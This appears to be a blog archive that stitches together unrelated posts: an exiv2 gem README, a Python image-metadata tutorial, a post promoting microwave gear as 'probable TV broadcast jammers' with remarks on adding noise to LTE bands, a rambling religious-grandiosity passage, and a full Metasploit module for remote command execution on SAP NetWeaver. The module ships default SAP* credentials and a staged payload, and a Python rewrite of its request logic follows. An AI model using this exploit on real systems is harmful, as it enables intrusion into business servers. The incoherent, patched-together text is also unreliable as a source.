Tuesday, May 15, 2018

CODE IS ...

....A simple wrapper around exiv2...
A simple wrapper around the C++ Exiv2 library for reading and writing image metadata.
Requires that the exiv2 C++ library is installed.

Usage

gem install exiv2
If you get a header-not-found error like the one below:
exiv2.cpp:1:10: fatal error: 'exiv2/image.hpp' file not found
#include "exiv2/image.hpp"
then pass the header and library paths explicitly:
gem install exiv2 -- --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
On macOS with Homebrew's exiv2, EXIV2_PREFIX can be set with:
export EXIV2_PREFIX=$(brew --prefix exiv2)
If you get this error while trying to install as part of a bundle install, you can set these paths using:
bundle config build.exiv2 --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
If you are on a newer version of the Command Line Tools (newer than 6.2) and run into the following error:
/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1/iterator:341:10: fatal error: '__debug' file not found
#include <__debug>
you can apply the quick hack of creating a new file /Library/Developer/CommandLineTools/usr/include/c++/v1/__debug with this content:
#ifndef _LIBCPP_ASSERT
#define _LIBCPP_ASSERT(...) ((void)0)
#endif
Once everything is successfully installed, you can give it a go:
require 'exiv2'
image = Exiv2::ImageFactory.open("image.jpg")
image.read_metadata
image.iptc_data.each do |key, value|
  puts "#{key} = #{value}\n"
end
image.exif_data.each { ... }
image.xmp_data.each { ... }

iptc_data_hash  = image.iptc_data.to_hash
xmp_data_hash   = image.xmp_data.to_hash

image.exif_data.delete("Exif.Image.Software")
image.iptc_data.delete_all("Iptc.Application2.Keywords")

image.iptc_data["Iptc.Application2.Caption"] = "A New Caption"
image.iptc_data.add("Iptc.Application2.Keywords", "fishy")

image.write_metadata



welcome back...to war! "Not that I'm currently cruising for jobs with British intelligence or anything, but I happened upon (via Hacker News) this current coding challenge posted to the MI5 careers page...."
Prerequisites: Assuming you've already downloaded and installed Python, you should do two things. One: spend 10 minutes doing this "Hello, World" Python for non-programmers tutorial. Two: spend another five minutes doing this tutorial on using Python modules

0.0) Install Pillow

The active version of PIL is actually known as Pillow, so this is what we need to install. You should do this with the Python package manager pip, which is covered in the second prerequisite tutorial above. Just:
pip install pillow
Now, create a new Python script in whatever text editor you like. I'm using Sublime Text, which is great. I called my script metaread.py.

1.0) Create an Image object

First thing we're going to do is actually bring in the Pillow module we installed, which is the first line below. Next, we need to create an object representation of our MI5 image, puzzle.png. This exposes the image and all of the things we can do with it via the Pillow module to our Python script. To see some more of these capabilities, check out Hack This: Edit an Image in Python.
from PIL import Image

image = Image.open("puzzle.png")

2.0) Extract the Exif data

Not all image formats carry Exif data; in practice it is mostly JPEGs (and TIFFs). Which is fine because that's most pictures. MI5's image is actually a .PNG file, which we'll have to handle somewhat differently. Let's do a quick JPG first though.
There's really nothing to it. I create the image object as above and then call the _getexif() function on it. In return, I get a dictionary data structure full of metadata (or None, if the file carries no Exif at all).
The dictionary consists of tag-value pairs, which we can extract and view using a for-loop, like this. Note that I had to import some extra stuff at the top:
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS

image = Image.open("gpsample.jpg")
print(image)
info = image._getexif()  # None when the file has no Exif segment, so guard before iterating
if info:
    for tag, value in info.items():
        key = TAGS.get(tag, tag)  # unknown tag ids stay numeric, hence str() below
        print(str(key) + " " + str(value))
So, that just outputs all of the Exif data contained within a given image as a series of entries. It's hardly guaranteed to be the same for every image. I had to search online for a sample image containing GPS metadata because I got tired of scanning through everything on my computer trying to find an example (though it wouldn't be too hard to write a script that could comb through a file of images and automatically pull out those that do include it). In any case, you can find the same image here.
A sampling of the output:
GPSInfo {0: '\x00\x00\x02\x02', 1: u'S', 2: ((33, 1), (51, 1), (2191, 100)), 3: u'E', 4: ((151, 1), (13, 1), (1173, 100)), 5: '\x00', 6: (0, 1)}
ISOSpeedRatings 100
ResolutionUnit 2
WhiteBalance 0
GainControl 0
BrightnessValue (100, 10)
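The GPSInfo entry above is the interesting one from a privacy standpoint, and the article imports GPSTAGS without ever using it. As an added example (not part of the article, and not Pillow's code), here is how to turn that raw structure into signed decimal coordinates. The sample dictionary is constructed from the printed output above; the four GPS tag ids are the standard Exif ones (PIL.ExifTags.GPSTAGS has the full table), and the code accepts both the (numerator, denominator) tuples shown here and the IFDRational objects newer Pillow releases return.

```python
# Standard Exif GPS IFD tag ids for the fields used here; PIL.ExifTags.GPSTAGS holds the full table.
GPS_TAGS = {1: "GPSLatitudeRef", 2: "GPSLatitude", 3: "GPSLongitudeRef", 4: "GPSLongitude"}

# Constructed from the GPSInfo line printed above; not read from a file.
SAMPLE_GPSINFO = {
    0: b"\x00\x00\x02\x02",
    1: "S", 2: ((33, 1), (51, 1), (2191, 100)),
    3: "E", 4: ((151, 1), (13, 1), (1173, 100)),
    5: b"\x00", 6: (0, 1),
}


def _to_float(value):
    """Exif rationals arrive as (numerator, denominator) tuples or, in newer Pillow, as IFDRational."""
    if isinstance(value, tuple):
        numerator, denominator = value
        return numerator / denominator
    return float(value)


def dms_to_decimal(dms, ref):
    """Degrees/minutes/seconds triple plus hemisphere letter -> signed decimal degrees."""
    if isinstance(ref, bytes):
        ref = ref.decode("ascii", "replace")
    degrees, minutes, seconds = (_to_float(part) for part in dms)
    decimal = degrees + minutes / 60 + seconds / 3600
    return -decimal if ref in ("S", "W") else decimal


def gps_coordinates(gpsinfo):
    """Return (latitude, longitude) from a GPSInfo dict, or None when the fix is incomplete."""
    named = {GPS_TAGS.get(tag, tag): value for tag, value in gpsinfo.items()}
    needed = ("GPSLatitude", "GPSLatitudeRef", "GPSLongitude", "GPSLongitudeRef")
    if not all(name in named for name in needed):
        return None
    latitude = dms_to_decimal(named["GPSLatitude"], named["GPSLatitudeRef"])
    longitude = dms_to_decimal(named["GPSLongitude"], named["GPSLongitudeRef"])
    return latitude, longitude


if __name__ == "__main__":
    print(gps_coordinates(SAMPLE_GPSINFO))
```

With a real file, pass the nested dictionary Pillow returns for the GPSInfo tag (id 0x8825): gps_coordinates(image._getexif().get(0x8825, {})). The sample resolves to roughly 33.856 S, 151.220 E, which is why stripping this block before publishing a photo matters.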

2.1) Extract non-Exif data

Again, PNGs don't come with Exif data.
Don't panic. Just because it's not in Exif format doesn't mean that puzzle.png's metadata is all that more difficult to access.
It so happens that when an image is loaded per step 1.0, the PIL module will automatically load up a dictionary with whatever metadata it can identify. We can barf it all out to the screen with a simple print statement:
print(image.info)
Or we can loop through it as in 2.0 as such:
for key, value in image.info.items():  # PNG keys are already strings, no TAGS lookup needed
    print(str(key) + " " + str(value))
Problem solved?
So, at this point I need to confess that this .info attribute is not actually returning all of the metadata from puzzle.png, and I don't quite know why. In addition to regular old Photoshop and the ExifRead Python tool mentioned above, I also tried four different online metadata extraction tools and only one was able to return a complete listing: Jeffrey Friedl's Image Metadata Viewer. Said viewer is based on a command-line tool called ExifTool, which I downloaded and ran. It too worked.
But I promised Python and Python we shall write. It's actually pretty easy to run a command-line program from within Python, but you'll still have to download the actual command line program, which is available here. Now, we can run this script on our image file, and the ExifTool will output the result via Python to the screen. Try it.
import os

# -h makes exiftool emit an HTML table; quote the path if the filename is not under your control
os.system('exiftool -h puzzle.png')
See the clue?
I don't know why it was so difficult to pull metadata from this file. It may have something to do with how metadata in PNG files is laid out. Within the file, metadata is kept in data structures called chunks. Each chunk has a four-letter type whose letter case encodes, among other things, whether the chunk is "critical" or not. Critical chunks hold the actual image data, the header (dimensions and bit depth) and the colour palette. Ancillary chunks carry histograms, gamma values, default background colours and, finally, text. There are three kinds of text chunk (tEXt, zTXt and iTXt), all sharing the same keyword-plus-text layout: each entry has a keyword, then the associated text. Keywords can be user-defined, but some are predefined, such as "Comment". Which in our MI5 file contains this:
https://motherboard.vice.com/en_us/article/aekn58/hack-this-extra-image-metadata-using-python
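Since the article's complaint in 2.1 is that image.info does not surface everything, here is an added example that walks the PNG chunk structure described above directly, without Pillow or ExifTool. This is not the article's code and not the MI5 puzzle file: the sample PNG is constructed in the code (a 1x1 greyscale image carrying a tEXt, a zTXt and an iTXt chunk, plus bytes appended after IEND). Each chunk's CRC is checked, because a chunk whose CRC does not match is the usual sign that someone edited the file by hand, and anything after IEND is reported because decoders ignore it.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype, payload):
    """Encode one chunk: big-endian length, 4-byte type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def iter_chunks(data):
    """Yield (type, payload, crc_ok) for each chunk up to and including IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start = pos + 8
        if start + length + 4 > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        payload = data[start:start + length]
        (crc,) = struct.unpack(">I", data[start + length:start + length + 4])
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == crc
        yield ctype.decode("latin-1"), payload, crc_ok
        pos = start + length + 4
        if ctype == b"IEND":
            break


def decode_text_chunk(ctype, payload):
    """Decode tEXt, zTXt and iTXt into (keyword, text); return None for any other chunk."""
    if ctype not in ("tEXt", "zTXt", "iTXt"):
        return None
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == "tEXt":  # keyword NUL latin-1 text
        return keyword.decode("latin-1"), rest.decode("latin-1")
    if ctype == "zTXt":  # keyword NUL method (0 = deflate) compressed latin-1 text
        if rest[0] != 0:
            raise ValueError("unknown zTXt compression method")
        return keyword.decode("latin-1"), zlib.decompress(rest[1:]).decode("latin-1")
    # iTXt: keyword NUL compflag compmethod language NUL translated-keyword NUL utf-8 text
    compressed, method = rest[0], rest[1]
    _language, _, rest = rest[2:].partition(b"\x00")
    _translated, _, text = rest.partition(b"\x00")
    if compressed:
        if method != 0:
            raise ValueError("unknown iTXt compression method")
        text = zlib.decompress(text)
    return keyword.decode("latin-1"), text.decode("utf-8")


def extract_text(data):
    """All text entries as (chunk_type, keyword, text, crc_ok) in file order."""
    found = []
    for ctype, payload, crc_ok in iter_chunks(data):
        entry = decode_text_chunk(ctype, payload)
        if entry is not None:
            found.append((ctype, entry[0], entry[1], crc_ok))
    return found


def trailing_bytes(data):
    """Bytes after IEND: decoders ignore them, so they are a favourite hiding place."""
    pos = len(PNG_SIGNATURE)
    for _ctype, payload, _crc_ok in iter_chunks(data):
        pos += 12 + len(payload)
    return data[pos:]


def build_sample_png():
    """Constructed 1x1 greyscale PNG with all three text chunk kinds (not the MI5 file)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00")  # one filter byte plus one grey pixel
    ztxt = b"Software\x00" + b"\x00" + zlib.compress(b"made by hand")
    itxt = b"Title\x00" + b"\x00\x00" + b"en\x00" + b"\x00" + "Hello \u00e9".encode("utf-8")
    return (PNG_SIGNATURE
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"tEXt", b"Comment\x00the clue goes here")
            + make_chunk(b"zTXt", ztxt)
            + make_chunk(b"iTXt", itxt)
            + make_chunk(b"IDAT", idat)
            + make_chunk(b"IEND", b"")
            + b"hidden after IEND")


if __name__ == "__main__":
    sample = build_sample_png()
    for ctype, keyword, text, crc_ok in extract_text(sample):
        print(ctype, keyword, repr(text), "crc ok" if crc_ok else "CRC MISMATCH")
    print("trailing bytes:", trailing_bytes(sample))
```

To run it on a real file, replace build_sample_png() with open("puzzle.png", "rb").read(). Pillow's image.info is built from a subset of these same chunks, which is why walking them yourself is the reliable fallback when a viewer shows less than ExifTool does.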

Monday, May 14, 2018

back to war! so...who wants completely secure communications, and probable TV broadcast jammers?


http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html

Comments
Elsa David: starting another week, Monday, 13.35, Standing NATO Maritime Group 1

Elsa David: what's the philosophy? "receive the LTE signals, filter band 3 and band 40, add noise and increase the amplitude of the signal"

At 4 am ...I explained to my tribe who am I ...what are my powers...all of my Prophets have powers, that God will reveal when the time comes

Maybe I am a semi-Goddess ...I keep on saying to invisible Jesus my Lord, you better have a very special place for me in Paradise, since I'm being used by God, for some task and purpose I don't know what it is, and I'm not being paid!!!!! Maybe Jesus got my Mother pregnant, when she was for 3 years trying, picked my Mother specially for a truly Queen taste. And keeps me here, using my rage, on a world that should have made me very very rich...keeps me here poor and prisoner. Maybe Jesus architected this story, by making me, not a top model, but the most loved girl in the world...for a sexy look, that I had for years, (and still have) that is universal; a sexy look, that Jesus carefully studied on Men's preferences....My natural talent for espionage...My giant megalomania views. ...My realism ...my pure heart...my good intentions...and horrible revenges ....as we spoke, the phone rang ...my Mother telling (us) the old man has a lottery ticket in his pocket for me...didn't say how much or when he would give it to me...
We live in times where computers are nano-sized and can penetrate your skin. God has a task for me, for all my friends gathered at my house. Jesus said.."if I told you your actions in the future, you would change them" He downloaded me terabytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket in His pocket, not saying how much and when He will give it to us.


Sunday, May 13, 2018

Some people # just seem to enjoy hacking SAP :) ...back to war! ...just wait for maintenance....

require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  Rank = GreatRanking
 
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
 
  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
      'Description' => %q{
          This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
        SOAP RFC Service, to execute remote commands. This module needs SAP credentials with
        privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
        successfully on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References' =>
        [
          [ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ]
        ],
      'DisclosureDate' => 'May 8 2012',
      'Platform'       => ['win', 'unix'],
      'Targets' => [
        [ 'Linux',
          {
            'Arch'     => ARCH_CMD,
            'Platform' => 'unix'
            #'Payload'  =>
              #{
                #'DisableNops' => true,
                #'Space'       => 232,
                #'Compat'      =>
                  #{
                    #'PayloadType' => 'cmd',
                    #'RequiredCmd' => 'perl ruby',
                  #}
              #}
          }
        ],
        [ 'Windows x64',
          {
            'Arch' => ARCH_X86_64,
            'Platform' => 'win'
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'Author' =>
        [
          'nmonkee'
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end
 
  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end
 
  # Element names follow the SXPG_COMMAND_EXECUTE RFC interface:
  # ADDITIONAL_PARAMETERS, COMMANDNAME, OPERATINGSYSTEM and EXEC_PROTOCOL.
  def build_soap_request(command, sap_command, sap_os)
    data = '<?xml version="1.0" encoding="utf-8" ?>' + "\r\n"
    data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + "\r\n"
    data << '<env:Body>' + "\r\n"
    data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' + "\r\n"
    data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\r\n"
    data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>\r\n"
    data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\r\n"
    data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>' + "\r\n"
    data << '</n1:SXPG_COMMAND_EXECUTE>' + "\r\n"
    data << '</env:Body>' + "\r\n"
    data << '</env:Envelope>' + "\r\n"
 
    return data
  end
 
  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end
 
  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ","\t")
        # XML-escape the payload before embedding it in the SOAP body
        my_payload.gsub!("&","&amp;")
        my_payload.gsub!("<","&lt;")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
 
    end
 
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end
 
  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&amp;")  # XML-escape before embedding in the SOAP body
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        print_status("#{res.code}\n#{res.body}") if res
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end
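As an added example, not part of the Metasploit module above and not Metasploit code, here is the same request/response logic written stand-alone in Python so the two points that matter can be checked offline: every caller-supplied value is XML-escaped before it is placed in the SOAP body (the reason the module rewrites & and < in its payload), and the decision rules from check() and exploit() are applied to sample responses. The element names ADDITIONAL_PARAMETERS, COMMANDNAME, OPERATINGSYSTEM and EXEC_PROTOCOL are the RFC's parameter names as used by the module; the 401 branch is an addition the module does not have; the two sample responses are constructed, not captured from a SAP system. Nothing here sends traffic.

```python
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
RFC_NS = "urn:sap-com:document:sap:rfc:functions"
RFC_PATH = "/sap/bc/soap/rfc"  # the ICF service the module posts to


def build_sxpg_request(additional_parameters, command_name, operating_system):
    """SOAP body for SXPG_COMMAND_EXECUTE; every caller-supplied value is XML-escaped
    so that '&' and '<' in a payload cannot break out of their elements."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<env:Envelope xmlns:env="{SOAP_ENV}"><env:Body>'
        f'<n1:SXPG_COMMAND_EXECUTE xmlns:n1="{RFC_NS}">'
        f"<ADDITIONAL_PARAMETERS>{escape(additional_parameters)}</ADDITIONAL_PARAMETERS>"
        f"<COMMANDNAME>{escape(command_name)}</COMMANDNAME>"
        f"<OPERATINGSYSTEM>{escape(operating_system)}</OPERATINGSYSTEM>"
        "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
        "</n1:SXPG_COMMAND_EXECUTE></env:Body></env:Envelope>"
    )


def request_headers(client, username, password):
    """Headers the module sends with the body: basic auth, sap-client cookie, SOAPAction."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return {
        "Authorization": f"Basic {token}",
        "Cookie": f"sap-usercontext=sap-language=EN&sap-client={client}",
        "Content-Type": "text/xml; charset=UTF-8",
        "SOAPAction": "urn:sap-com:document:sap:rfc:functions",
    }


def parse_sxpg_request(xml_text):
    """Parse a request back into {element: text}; shows the escaping round-trips intact."""
    root = ET.fromstring(xml_text)
    call = root.find(f"{{{SOAP_ENV}}}Body/{{{RFC_NS}}}SXPG_COMMAND_EXECUTE")
    return {child.tag: (child.text or "") for child in call if child.tag != "EXEC_PROTOCOL"}


def classify_response(status, body):
    """Apply the module's check()/exploit() decision rules to an HTTP status and body.
    Returns (verdict, faultstrings)."""
    if status == 401:  # added here: the module needs a user allowed to call the service
        return "auth_required", []
    if status == 500 and "faultstring" in body:  # check(): SOAP fault means the endpoint is live
        return "detected", re.findall(r"<faultstring>(.*?)</faultstring>", body, re.S)
    if status == 200 and "External program terminated" in body:  # exploit(): command ran
        return "executed", []
    if status == 200:
        return "accepted", []
    return "unknown", []


# Constructed sample responses (not captured from a real SAP system).
FAULT_RESPONSE = (
    f'<env:Envelope xmlns:env="{SOAP_ENV}"><env:Body><env:Fault>'
    "<faultcode>env:Client</faultcode><faultstring>Illegal document</faultstring>"
    "</env:Fault></env:Body></env:Envelope>"
)
EXEC_RESPONSE = (
    f'<env:Envelope xmlns:env="{SOAP_ENV}"><env:Body>'
    f'<n1:SXPG_COMMAND_EXECUTE.Response xmlns:n1="{RFC_NS}"><EXEC_PROTOCOL>'
    "<item><MESSAGE>External program terminated with exit code 0</MESSAGE></item>"
    "</EXEC_PROTOCOL></n1:SXPG_COMMAND_EXECUTE.Response></env:Body></env:Envelope>"
)


if __name__ == "__main__":
    body = build_sxpg_request("-o /tmp/x -n pwnie\n!echo a&b <c", "DBMCLI", "ANYOS")
    print(body)
    print(parse_sxpg_request(body))
    print(classify_response(500, FAULT_RESPONSE))
    print(classify_response(200, EXEC_RESPONSE))
```

The module sends exactly this shape to /sap/bc/soap/rfc with the headers from request_headers(); it only works when the credentials are valid for that service and the external commands it abuses (DBMCLI, LIST_DB2DUMP) are still callable, which is where the two SAP notes in the module's references come in.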